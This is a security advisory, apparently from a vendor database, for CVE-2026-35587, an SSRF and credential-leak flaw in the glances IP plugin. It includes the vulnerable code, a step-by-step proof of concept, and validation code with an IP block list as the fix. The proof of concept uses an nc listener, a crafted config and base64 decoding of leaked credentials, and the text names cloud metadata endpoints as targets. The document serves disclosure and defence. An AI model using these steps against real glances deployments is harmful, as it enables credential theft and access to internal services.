CVE-2026-35587 is a high-severity server-side request forgery (SSRF) vulnerability in glances (pip), affecting versions < 4.5.4. It is fixed in 4.5.4.
Summary

A Server-Side Request Forgery (SSRF) vulnerability exists in the Glances IP plugin due to improper validation of the public_api configuration parameter. The value of public_api is used directly in outbound HTTP requests without any scheme restriction or hostname/IP validation. An attacker who can modify the Glances configuration can force the application to send requests to arbitrary internal or external endpoints. Additionally, when public_username and public_password are set, Glances automatically includes these credentials in the Authorization: Basic header, resulting in credential leakage to attacker-controlled servers.

This vulnerability can be exploited to:
- Access internal network services (e.g., 127.0.0.1, 192.168.x.x)
- Retrieve sensitive data from cloud metadata endpoints (e.g., 169.254.169.254)
- Exfiltrate credentials via outbound HTTP requests

The issue arises because public_api is passed directly to the HTTP client (urlopen_auth) without validation, allowing unrestricted outbound connections and unintended disclosure of sensitive information.

Details

The vulnerability exists in the Glances IP plugin, where the public_api configuration value is used to fetch public IP information. This value is read directly from the configuration file and passed to the HTTP client without any validation.

Root Cause

In glances/plugins/ip/__init__.py, the public_api parameter is retrieved from configuration and later used to initialize a background thread responsible for making HTTP requests (the relevant code is quoted under Vulnerability Location below). There is no validation performed on:
- URL scheme (e.g., http, https, file)
- Hostname or resolved IP address
- Internal or restricted IP ranges

Unsafe HTTP Request Handling

The request is executed via urlopen_auth() in glances/globals.py. This function:
- Accepts any URL passed to it
- Automatically attaches a Basic Authorization header
- Does not enforce any restrictions on the destination

PoC: SSRF via public_api (Glances IP Plugin)

Prerequisites: Glances installed, two terminals.

Step 1: Start a listener (Terminal 1)

```shell
nc -lvnp 9999
```

Step 2: Create the malicious config (Terminal 2)

```shell
mkdir -p ~/.config/glances
cat > ~/.config/glances/glances.conf << 'EOF'
[ip]
public_disabled=False
public_api=http://127.0.0.1:9999/ssrf-poc
public_username=apiuser
public_password=S3cr3tP@ss
EOF
```

Step 3: Start Glances

```shell
glances --webserver
```

Step 4: Observe the SSRF request (Terminal 1)

```
GET /ssrf-poc HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Python-urllib/3.x
Authorization: Basic YXBpdXNlcjpTM2NyM3RQQHNz
```

Step 5: Decode the leaked credentials

```shell
echo "YXBpdXNlcjpTM2NyM3RQQHNz" | base64 -d
```

Output: apiuser:S3cr3tP@ss

Step 6: Confirm the data via the API

```shell
curl -s http://127.0.0.1:61208/api/4/ip
```

Impact

This vulnerability allows an attacker to control outbound HTTP requests made by the Glances IP plugin via the public_api configuration parameter.

- Server-Side Request Forgery (SSRF): The application can be forced to send requests to arbitrary endpoints, including internal services and localhost.
- Credential Leakage: When public_username and public_password are configured, they are automatically sent in the Authorization: Basic header to any target defined in public_api, exposing credentials to attacker-controlled servers.
- Internal Network Access: The vulnerability enables access to internal resources such as 127.0.0.1 (localhost services) and private network ranges (192.168.x.x, 10.x.x.x, 172.16.x.x).
- Cloud Metadata Exposure: The application can be directed to query cloud metadata endpoints such as http://169.254.169.254/, potentially exposing sensitive credentials (e.g., IAM tokens in cloud environments).
- Data Injection / Manipulation: Responses from attacker-controlled servers are accepted and stored by Glances, then exposed via /api/4/ip, allowing injection of arbitrary data into the application.

Vulnerability Location

The issue originates from how the public_api configuration value is handled and used without validation.

Source of user-controlled input. File: glances/plugins/ip/__init__.py (around lines ~64–82):

```python
self.public_api = self.get_conf_value("public_api", default=[None])[0]
self.public_username = self.get_conf_value("public_username", default=[None])[0]
self.public_password = self.get_conf_value("public_password", default=[None])[0]
```

- public_api is fully user-controlled via configuration
- No validation is applied at this stage

Missing validation before usage:

```python
self.public_disabled = (
    self.get_conf_value('public_disabled', default='False')[0].lower() != 'false'
    or self.public_api is None
    or self.public_field is None
)
```

- Only checks whether the value is None
- No validation of URL scheme, hostname, or IP address range

Vulnerable sink (critical point):

```python
self.public_ip_thread = ThreadPublicIpAddress(
    url=self.public_api,  # ← user-controlled input
    username=self.public_username,
    password=self.public_password,
    refresh_interval=self.public_address_refresh_interval,
)
```

- The user-controlled public_api is passed directly into a network request
- This is the SSRF entry point

Unsafe HTTP execution. File: glances/globals.py (around lines ~360+):

```python
import base64
from urllib.request import Request, urlopen


def urlopen_auth(url, username, password, timeout=3):
    # Opens whatever URL it is given and always attaches the Basic credentials.
    return urlopen(
        Request(
            url,  # ← no validation at all
            headers={
                'Authorization': 'Basic ' + base64.b64encode(f'{username}:{password}'.encode()).decode()
            },
        ),
        timeout=timeout,
    )
```

- Accepts any URL
- Sends the request blindly
- Automatically attaches credentials to any destination

Root Cause

A user-controlled configuration value (public_api) is passed directly into an HTTP request without validation of scheme or destination, resulting in SSRF and credential leakage.

Recommendation

The fix must be applied before the URL is used, specifically in the IP plugin (__init__.py).

1. Enforce scheme restrictions. Allow only http and https; reject file://, gopher://, ftp:// and any other non-HTTP protocol. This prevents protocol abuse and local file access.
2. Validate the destination host. Resolve the hostname to an IP address and check the resolved IP against restricted ranges. Block if the IP is loopback (127.0.0.0/8), private (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) or link-local (169.254.0.0/16, used by cloud metadata services). This prevents internal network probing, AWS/GCP/Azure metadata access and localhost abuse.
3. Enforce validation before thread creation. The validation must occur before initializing ThreadPublicIpAddress(...). If validation fails, disable the plugin and do not send any request.
4. Trust boundary clarification. urlopen_auth() is a low-level utility and should not be responsible for validation. The caller (the IP plugin) must ensure that only safe, external URLs are passed.

Why This Fix Works

Scheme validation blocks protocol-based attacks, and IP validation blocks internal and cloud targets. Combined, they eliminate the SSRF attack surface while preserving legitimate use cases (public IP APIs).
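As an added example (not glances' own code), a check that implements the recommendation above: it rejects non-HTTP schemes and any host that resolves into loopback, private or link-local space, and a plugin would call it before creating ThreadPublicIpAddress, disabling the public IP lookup when it returns False. The function names, the injectable resolver and the IPv6 ranges are assumptions beyond the advisory text.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Ranges the recommendation blocks, plus their IPv6 equivalents (an assumption).
BLOCKED_NETWORKS = [
    ipaddress.ip_network("127.0.0.0/8"),     # loopback
    ipaddress.ip_network("10.0.0.0/8"),      # private
    ipaddress.ip_network("172.16.0.0/12"),   # private
    ipaddress.ip_network("192.168.0.0/16"),  # private
    ipaddress.ip_network("169.254.0.0/16"),  # link-local / cloud metadata
    ipaddress.ip_network("::1/128"),         # IPv6 loopback
    ipaddress.ip_network("fc00::/7"),        # IPv6 unique local
    ipaddress.ip_network("fe80::/10"),       # IPv6 link-local
]

def resolve_host(host):
    """Return every address string the host resolves to (A and AAAA records)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

def validate_public_api_url(url, resolver=resolve_host):
    """Return (ok, reason) for a public_api value. The resolver is injectable so
    the check can be exercised offline; the default uses real DNS."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False, f"scheme {parsed.scheme!r} is not allowed"
    host = parsed.hostname
    if not host:
        return False, "URL has no host"
    try:
        # A literal IP needs no lookup; a hostname is resolved to all its addresses.
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"cannot resolve {host}: {exc}"
    for text in addrs:
        addr = ipaddress.ip_address(text)
        # Unwrap IPv4-mapped IPv6 (::ffff:10.0.0.5) so it is checked against the IPv4 ranges.
        candidate = (addr.ipv4_mapped or addr) if addr.version == 6 else addr
        if any(candidate in net for net in BLOCKED_NETWORKS):
            return False, f"{host} resolves to {addr}, which is in a blocked range"
    return True, "ok"
```

The address seen here is resolved at validation time while urlopen resolves again at request time, so a hostname whose record changes between the two (DNS rebinding) can still reach a blocked range; pinning the validated address into the request, or re-running the check inside the HTTP client, closes that gap.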
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2026-35587 has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.
A fixed version is available (4.5.4). Upgrading removes the vulnerable code path.
Ecosystem: pip
Affected: glances (< 4.5.4)
Fixed: glances → 4.5.4 (pip)

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.
Kodem's runtime-powered SCA identifies whether CVE-2026-35587 is reachable in your applications.
Upgrade glances to 4.5.4 or later to resolve this vulnerability.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
CVE-2026-35587 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
glances (pip) versions < 4.5.4 are affected.
Yes. CVE-2026-35587 is fixed in 4.5.4. Upgrade to this version or later.
Whether CVE-2026-35587 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
Upgrade glances to 4.5.4 or later.